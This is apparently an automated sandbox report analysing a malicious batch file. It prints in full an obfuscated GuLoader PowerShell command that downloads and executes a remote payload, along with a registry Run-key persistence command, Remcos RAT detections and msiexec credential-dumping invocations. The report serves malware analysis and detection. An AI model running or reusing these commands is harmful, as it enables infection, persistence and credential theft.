b6 ab 64 d3 35 ab 98 38 f9 09 ce 33 0d c2 b4 0d 61 2b 4e dd 05 0e d0 18 1f f0 3c 0b a4 61 04 9b 86
                                                                  Data Ascii: 7?1aX3P*mI>v2e~O-5mt^TUB0dD^74X( ;&X7oXgb*3Ko@D==wHu85N!LN]fKj#AEWUw#oOC*|nP,lZ5<Gd583a+N<a


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                                                                  Imagebase:0x7ff75bd40000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;"
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:07:07:31
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;"
                                                                  Imagebase:0xbd0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2391081799.00000000081E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2402043771.000000000A47D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:07:07:31
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:07:07:55
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                  Imagebase:0x7ff6068e0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:10
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                                                                  Imagebase:0x7ff632ac0000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                                                                  Imagebase:0x650000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FF848E8B276 Relevance: .6, Instructions: 550COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 71e8e5f87a9a08a4bd2beeadec7dfbcf5a924f02a6542597220fd807d1d5df70
                                                                    • Instruction ID: 7199d462901cd7fa96e9a95bff89aa11959291412c5c6761f4307daadc07e8ac
                                                                    • Opcode Fuzzy Hash: 71e8e5f87a9a08a4bd2beeadec7dfbcf5a924f02a6542597220fd807d1d5df70
                                                                    • Instruction Fuzzy Hash: F412803091CA8E8FEBA8EF28C8567E937D1FF94350F44427AD84DC7291DB38A9458B45
                                                                    Function 00007FF848E8C022 Relevance: .5, Instructions: 528COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a095e63982270a149f294a532e432512b818b686616724c162cbc71150b4ffd
                                                                    • Instruction ID: 1739923e826f467c4cfb0130dfac30b4b772a497056ae04343f605616902164d
                                                                    • Opcode Fuzzy Hash: 1a095e63982270a149f294a532e432512b818b686616724c162cbc71150b4ffd
                                                                    • Instruction Fuzzy Hash: F402903090CA4E8FEBA8EF28C8557E937E1FF55350F44427AD84DC7291DB38A9858B85
                                                                    Function 00007FF848F548F9 Relevance: 4.3, Strings: 3, Instructions: 527COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
